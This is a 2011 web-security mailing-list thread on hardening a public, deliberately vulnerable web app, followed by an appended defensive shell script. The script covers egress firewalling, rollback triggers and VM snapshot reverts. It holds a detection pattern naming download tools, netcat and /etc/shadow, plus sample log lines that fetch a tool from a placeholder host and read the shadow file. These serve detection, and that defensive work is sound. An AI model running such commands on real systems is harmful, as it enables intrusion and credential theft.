Web Application Security
Re: securing a deliberately vulnerable web app Jul 05 2011 09:35PM
Robin Wood (robin digininja org)
On 5 July 2011 22:32, Charlie Belmer <charlie.belmer (at) gmail (dot) com [email concealed]> wrote:
> Hi Robin,
>
> A couple of suggestions:
>
> Definitely VM it and roll it back frequently. You might want a list of
> warnings to watch for, like someone trying to install root kits or run
> certain shell commands, at which point it could trigger a roll back to
> remove any custom malicious software.
> Don't allow any connections out from the server, aside from the HTTP (or
> whatever) connections initiated by the web browsers. This goes a long way to
> preventing pivot attacks. (Would have to be an external firewall device.)
> Make sure permissions on the web user are extremely low.
> Use a bare bones server image - strip out anything unnecessary from the
> image which isn't required for your service. Especially things like
> compilers and libraries not used by your app.
> A lot of the test/practice apps just simulate security vulnerabilities to
> prevent this kind of thing - see
> http://zero.webappsecurity.com/rootlogin.asp.bak as case in point (which
> itself seems to be a security flaw..)
>
> I am sure there is more you can do, but this is what I could quickly come up
> with.
>

Thanks for the ideas.

Robin

> Charlie
> https://www.golemtechnologies.com
>
> On Sun, Jul 3, 2011 at 6:51 PM, Robin Wood <robin (at) digininja (dot) org [email concealed]> wrote:
>>
>> This is a question for anyone who runs a deliberately vulnerable web
>> app on a public facing site to allow people to test hacking it or to
>> test vulnerability scanners against it. I'm thinking of things like
>> http://test.acunetix.com/ .
>>
>> What I'd like to know is how you go about securing the box the sites
>> are running on. Obviously you need the site running on its own server,
>> preferably airgapped from the rest of your network but how do you
>> protect yourself from attackers getting on the box then pivoting from
>> it to do a real attack to someone else? I'm guessing it is something
>> like a VM that is automatically rolled back periodically so even if
>> someone tries then they only have a limited attack window but are
>> there any other things people do?
>>
>> I'm asking because I've got an idea for a new public service which
>> would involve putting up an app that is vulnerable but I'd like to
>> make sure that if I do I protect myself as much as possible.
>>
>> Robin
>>
>>
>>
>> This list is sponsored by Cenzic
>> --------------------------------------
>> Let Us Hack You. Before Hackers Do!
>> It's Finally Here - The Cenzic Website HealthCheck. FREE.
>> Request Yours Now!
>> http://www.cenzic.com/2009HClaunch_Securityfocus
>> --------------------------------------
>>
>
>

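The thread's suggestions (egress-only-replies firewalling, a watch-list of shell activity that should trigger a rollback, and an automatic snapshot revert of the VM) are sketched below as a small POSIX shell helper. This is an added example, not code from either poster; it assumes iptables for the on-box rules and libvirt's virsh for snapshot reverts, and the domain name, snapshot name, trigger patterns and the sample audit lines are all constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the thread): defensive helpers for a host that runs a
# deliberately vulnerable web app. Names, patterns and paths are assumptions.
set -u

# 1. Egress lockdown on the box itself: drop every new outbound connection and
#    only allow replies to traffic that came in (the browser's HTTP requests).
#    Prints the rules; pass APPLY=1 to execute them. Anyone who gets root on
#    the box can undo on-box rules, so this is a second layer behind the
#    external firewall the thread recommends, not a replacement for it.
egress_rules() {
    cat <<'EOF'
iptables -P OUTPUT DROP
iptables -F OUTPUT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
EOF
}

apply_egress_rules() {
    if [ "${APPLY:-0}" = "1" ]; then
        egress_rules | sh
    else
        egress_rules
    fi
}

# 2. Rollback triggers: patterns in a shell/audit log that show someone has
#    moved from "exploit the web app" to "install tooling on the box".
#    Prints matching lines and returns 0 when a trigger fires, 1 otherwise.
#    The list is an assumed starting point; tune it to the app in question.
TRIGGER_PATTERNS='insmod|modprobe|wget |curl |chmod \+s|nc -l|/etc/shadow'

find_rollback_triggers() {
    logfile="$1"
    grep -E "$TRIGGER_PATTERNS" "$logfile"
}

# 3. Roll the VM back to a known-good snapshot via libvirt. DRY_RUN=1 (the
#    default here) only prints the command; set DRY_RUN=0 to really revert.
#    Domain and snapshot names are placeholders.
rollback_vm() {
    domain="${1:-vulnapp-vm}"
    snapshot="${2:-clean}"
    if [ "${DRY_RUN:-1}" = "1" ]; then
        echo "virsh snapshot-revert $domain $snapshot --running"
    else
        virsh snapshot-revert "$domain" "$snapshot" --running
    fi
}

# Intended to run from cron: if any trigger fired, revert the snapshot.
check_and_rollback() {
    if find_rollback_triggers "$1" >/dev/null; then
        rollback_vm "vulnapp-vm" "clean"
        return 0
    fi
    return 1
}

# Constructed sample audit lines (not a real log) to exercise the trigger check.
SAMPLE_LOG="$(mktemp)"
cat >"$SAMPLE_LOG" <<'EOF'
www-data: GET /index.php
www-data: GET /search.php?q=test
www-data: sh -c "wget http://example.invalid/tool.tgz -O /tmp/tool.tgz"
www-data: sh -c "cat /etc/shadow"
EOF
```

Run it as `sh hardening.sh` to see the generated rules, and `check_and_rollback /var/log/audit-or-shell.log` from a cron entry on the hypervisor side, where the attacker cannot tamper with it. The two "sh -c" lines in the constructed log are the ones the trigger list catches; the plain GET lines are normal traffic for a site that exists to be attacked and should not cause a revert.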

Copyright 2010, SecurityFocus